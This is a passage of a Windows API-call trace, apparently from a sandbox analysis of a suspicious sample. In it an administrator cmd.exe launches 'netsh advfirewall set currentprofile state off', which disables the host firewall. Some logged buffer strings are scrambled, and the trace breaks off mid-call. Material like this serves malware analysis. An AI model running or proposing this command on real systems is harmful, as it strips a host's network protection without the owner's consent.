_wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.141] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.141] GetProcessHeap () returned 0x1eeca2b0000 [0136.141] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b6ef0) returned 1 [0136.141] GetProcessHeap () returned 0x1eeca2b0000 [0136.141] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x12) returned 0x1eeca2b6ef0 [0136.141] _get_osfhandle (_FileHandle=1) returned 0x274 [0136.141] SetConsoleMode (hConsoleHandle=0x274, dwMode=0x0) returned 0 [0136.141] _get_osfhandle (_FileHandle=0) returned 0x264 [0136.141] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0136.141] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\netsh.exe", lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x58b38fede0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh advfirewall set currentprofile state off", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x58b38fedb8 | out: lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessInformation=0x58b38fedb8*(hProcess=0x98, hThread=0x94, dwProcessId=0xf98, dwThreadId=0xf9c)) returned 1 [0136.217] CloseHandle (hObject=0x94) returned 1 [0136.217] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.217] GetProcessHeap () returned 0x1eeca2b0000 [0136.217] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b5a10) returned 1 [0136.217] GetEnvironmentStringsW () returned 0x1eeca2b5a10* [0136.217] GetProcessHeap () returned 0x1eeca2b0000 [0136.217] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xac4) returned 0x1eeca2c9510 [0136.217] FreeEnvironmentStringsA (penv="=") returned 1 [0136.217] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe6b580000 [0136.217] GetProcAddress (hModule=0x7ffe6b580000, lpProcName="NtQueryInformationProcess") returned 0x7ffe6b6256b0 [0136.217] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x58b38fe2b8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x58b38fe2b8, ReturnLength=0x0) returned 0x0 [0136.217] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0x3e0910c000, lpBuffer=0x58b38fe2f0, nSize=0x7a0, lpNumberOfBytesRead=0x58b38fe2b0 | out: lpBuffer=0x58b38fe2f0*, lpNumberOfBytesRead=0x58b38fe2b0*=0x7a0) returned 1 [0136.218] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0151.709] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x58b38fed38 | out: lpExitCode=0x58b38fed38*=0x0) returned 1 [0151.709] CloseHandle (hObject=0x98) returned 1 [0151.709] _vsnwprintf (in: _Buffer=0x58b38fef08, _BufferCount=0x13, _Format="%08X", _ArgList=0x58b38fed48 | out: _Buffer="00000000") returned 8 [0151.709] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.709] GetProcessHeap () returned 0x1eeca2b0000 [0151.709] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c9510) returned 1 [0151.709] GetEnvironmentStringsW () returned 0x1eeca2caae0* [0151.709] GetProcessHeap () returned 0x1eeca2b0000 [0151.709] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xaea) returned 0x1eeca2cb5e0 [0151.709] FreeEnvironmentStringsA (penv="=") returned 1 [0151.709] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.709] GetProcessHeap () returned 0x1eeca2b0000 [0151.709] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2cb5e0) returned 1 [0151.710] GetEnvironmentStringsW () returned 0x1eeca2caae0* [0151.710] GetProcessHeap () returned 0x1eeca2b0000 [0151.710] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xaea) returned 0x1eeca2cb5e0 [0151.710] FreeEnvironmentStringsA (penv="=") returned 1 [0151.710] GetProcessHeap () returned 0x1eeca2b0000 [0151.710] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b6ef0) returned 1 [0151.710] DeleteProcThreadAttributeList (in: lpAttributeList=0x58b38feec0 | out: lpAttributeList=0x58b38feec0) [0151.710] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0151.856] ??_V@YAXPEAX@Z () returned 0x1 [0151.856] _get_osfhandle (_FileHandle=1) returned 0x274 [0151.856] SetConsoleMode (hConsoleHandle=0x274, dwMode=0x0) returned 0 [0151.856] _get_osfhandle (_FileHandle=1) returned 0x274 [0151.856] GetConsoleMode (in: hConsoleHandle=0x274, lpMode=0x7ff6de08fc08 | out: lpMode=0x7ff6de08fc08) returned 0 [0151.857] _get_osfhandle (_FileHandle=0) returned 0x264 [0151.857] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x7ff6de08fc0c | out: lpMode=0x7ff6de08fc0c) returned 0 [0151.857] GetConsoleOutputCP () returned 0x1b5 [0152.145] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0152.145] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.325] GetProcessHeap () returned 0x1eeca2b0000 [0152.325] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c9080) returned 1 [0152.334] GetProcessHeap () returned 0x1eeca2b0000 [0152.338] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c8eb0) returned 1 [0152.341] GetProcessHeap () returned 0x1eeca2b0000 [0152.350] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c8cf0) returned 1 [0152.350] GetProcessHeap () returned 0x1eeca2b0000 [0152.350] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c8c90) returned 1 [0152.350] GetProcessHeap () returned 0x1eeca2b0000 [0152.350] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c8c10) returned 1 [0152.350] GetProcessHeap () returned 0x1eeca2b0000 [0152.350] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b8c20) returned 1 [0152.352] GetProcessHeap () returned 0x1eeca2b0000 [0152.352] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b8bb0) returned 1 [0152.355] GetProcessHeap () returned 0x1eeca2b0000 [0152.355] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b6c60) returned 1 [0152.357] GetProcessHeap () returned 0x1eeca2b0000 [0152.357] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b6e30) returned 1 [0152.357] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58b38ff2e8 | out: _Buffer="\r\n") returned 2 [0152.357] _get_osfhandle (_FileHandle=1) returned 0x274 [0152.357] GetFileType (hFile=0x274) returned 0x3 [0152.357] _get_osfhandle (_FileHandle=1) returned 0x274 [0152.357] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0152.357] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x58b38ff2b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff2b8*=0x2, lpOverlapped=0x0) returned 1 [0152.357] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0152.357] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1eeca3b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0152.357] _vsnwprintf (in: _Buffer=0x1eeca3c0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x58b38ff2f8 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0152.358] _vsnwprintf (in: _Buffer=0x1eeca3c0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x58b38ff2f8 | out: _Buffer=">") returned 1 [0152.358] _get_osfhandle (_FileHandle=1) returned 0x274 [0152.358] GetFileType (hFile=0x274) returned 0x3 [0152.358] _get_osfhandle (_FileHandle=1) returned 0x274 [0152.358] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0152.358] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x58b38ff2e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff2e8*=0x14, lpOverlapped=0x0) returned 1 [0152.358] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.358] GetFileType (hFile=0x264) returned 0x3 [0152.358] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.358] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.358] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c30, cchWideChar=1 | out: lpWideCharStr="netsh advfirewall set currentprofile state off\n") returned 1 [0152.358] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.358] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.358] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c32, cchWideChar=1 | out: lpWideCharStr="etsh advfirewall set currentprofile state off\n") returned 1 [0152.358] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.358] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.358] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c34, cchWideChar=1 | out: lpWideCharStr="tsh advfirewall set currentprofile state off\n") returned 1 [0152.358] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.358] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.358] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c36, cchWideChar=1 | out: lpWideCharStr="sh advfirewall set currentprofile state off\n") returned 1 [0152.358] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.358] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c38, cchWideChar=1 | out: lpWideCharStr="h advfirewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3a, cchWideChar=1 | out: lpWideCharStr=" advfirewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3c, cchWideChar=1 | out: lpWideCharStr="fdvfirewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3e, cchWideChar=1 | out: lpWideCharStr="ivfirewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c40, cchWideChar=1 | out: lpWideCharStr="rfirewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c42, cchWideChar=1 | out: lpWideCharStr="eirewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c44, cchWideChar=1 | out: lpWideCharStr="wrewall set currentprofile state off\n") returned 1 [0152.359] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.359] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.359] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c46, cchWideChar=1 | out: lpWideCharStr="aewall set currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.360] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c48, cchWideChar=1 | out: lpWideCharStr="lwall set currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.360] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4a, cchWideChar=1 | out: lpWideCharStr="lall set currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.360] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4c, cchWideChar=1 | out: lpWideCharStr=" ll set currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.360] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4e, cchWideChar=1 | out: lpWideCharStr="sl set currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.360] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c50, cchWideChar=1 | out: lpWideCharStr="e set currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.360] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c52, cchWideChar=1 | out: lpWideCharStr="tset currentprofile state off\n") returned 1 [0152.360] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c54, cchWideChar=1 | out: lpWideCharStr=" et currentprofile state off\n") returned 1 [0152.361] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.361] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c56, cchWideChar=1 | out: lpWideCharStr="ot currentprofile state off\n") returned 1 [0152.361] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.361] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c58, cchWideChar=1 | out: lpWideCharStr="p currentprofile state off\n") returned 1 [0152.361] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.361] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, 